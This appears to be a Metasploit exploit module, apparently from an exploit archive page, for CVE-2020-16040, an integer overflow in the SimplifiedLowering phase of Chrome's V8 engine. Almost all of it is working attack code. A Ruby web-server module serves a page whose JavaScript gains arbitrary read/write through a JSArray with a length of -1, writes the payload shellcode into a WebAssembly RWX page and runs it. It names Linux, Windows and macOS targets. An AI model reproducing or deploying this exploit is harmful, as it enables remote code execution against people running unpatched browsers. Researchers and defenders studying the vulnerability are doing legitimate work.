Google Chrome SimplfiedLowering Integer Overflow

                							

                ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase',
        'Description' => %q{
          This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit).
          The exploit makes use of a integer overflow in the SimplifiedLowering phase in turbofan.
          It is used along with a typer hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1.
          This is abused to gain arbitrary read/write into the isolate region.
          Then an ArrayBuffer can be used to achieve absolute arbitrary read/write.
          The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.
          The payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correctly.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Rajvardhan Agarwal (r4j)', # exploit
        ],
        'References' => [
          ['CVE', '2020-16040'],
          ['URL', 'https://chromium-review.googlesource.com/c/v8/v8/+/2557498'],
          ['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'],
          ['URL', 'https://faraz.faith/2021-01-07-cve-2020-16040-analysis/'],
          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1150649'],
        ],
        'Arch' => [ ARCH_X64 ],
        'DefaultTarget' => 0,
        'Targets' =>
          [
            ['Linux - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'linux' }],
            ['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'win' }],
            ['macOS - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'osx' }],
          ],
        'DisclosureDate' => '2020-11-19'
      )
    )
  end

  def on_request_uri(cli, request)
    print_status("Sending #{request.uri} to #{request['User-Agent']}")
    shellcode = Rex::Text.to_num(payload.encoded).gsub(/\r\n/, '')
    jscript = <<~JS
      var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
      var wasm_mod = new WebAssembly.Module(wasm_code);
      var wasm_instance = new WebAssembly.Instance(wasm_mod);
      var wasm_func = wasm_instance.exports.main;

      var buf = new ArrayBuffer(8);
      var f64_buf = new Float64Array(buf);
      var u64_buf = new Uint32Array(buf);
      var shellcode = new Uint8Array([#{shellcode}]);
      var shellbuf = new ArrayBuffer(shellcode.length);
      var dataview = new DataView(shellbuf);

      function ftoi(val) {
        f64_buf[0] = val;
        return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
      }

      function itof(val) {
        u64_buf[0] = Number(val & 0xffffffffn);
        u64_buf[1] = Number(val >> 32n);
        return f64_buf[0];
      }

      function foo(a) {
        var y = 0x7fffffff;

        if (a == NaN) y = NaN;
        if (a) y = -1;

        let z = y + 1;
        z >>= 31;
        z = 0x80000000 - Math.sign(z|1);

        if(a) z = 0;

        var arr = new Array(0-Math.sign(z));
        arr.shift();
        var cor = [1.1, 1.2, 1.3];

        return [arr, cor];
      }

      try {
        for(var i=0;i<0x3000;++i)
          foo(true);

        var x = foo(false);
      } catch (e) {
        location.reload();
      }
      var arr = x[0];
      var cor = x[1];

      const idx = 6;
      arr[idx+10] = 0x4242;

      function addrof(k) {
        arr[idx+1] = k;
        return ftoi(cor[0]) & 0xffffffffn;
      }

      function fakeobj(k) {
        cor[0] = itof(k);
        return arr[idx+1];
      }

      var float_array_map = ftoi(cor[3]);

      var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
      var fake = fakeobj(addrof(arr2) + 0x20n);

      function arbread(addr) {
        if (addr % 2n == 0) {
          addr += 1n;
        }
        arr2[1] = itof((2n << 32n) + addr - 8n);
        return ftoi(fake[0]);
      }

      function arbwrite(addr, val) {
        if (addr % 2n == 0) {
          addr += 1n;
        }
        arr2[1] = itof((2n << 32n) + addr - 8n);
        fake[0] = itof(BigInt(val));
      }

      function copy_shellcode(addr, shellcode) {
        let buf_addr = addrof(shellbuf);
        let backing_store_addr = buf_addr + 0x14n;
        arbwrite(backing_store_addr, addr);

        for (let i = 0; i < shellcode.length; i++) {
          dataview.setUint8(i, shellcode[i]);
        }
      }

      var rwx_page_addr = arbread(addrof(wasm_instance) + 0x68n);
      copy_shellcode(rwx_page_addr, shellcode);
      wasm_func();
    JS

    html = <<~HTML
      <html>
      <head>
      <script>
      #{jscript}
      </script>
      </head>
      <body>
      </body>
      </html>
    HTML
    send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
  end

end
<p>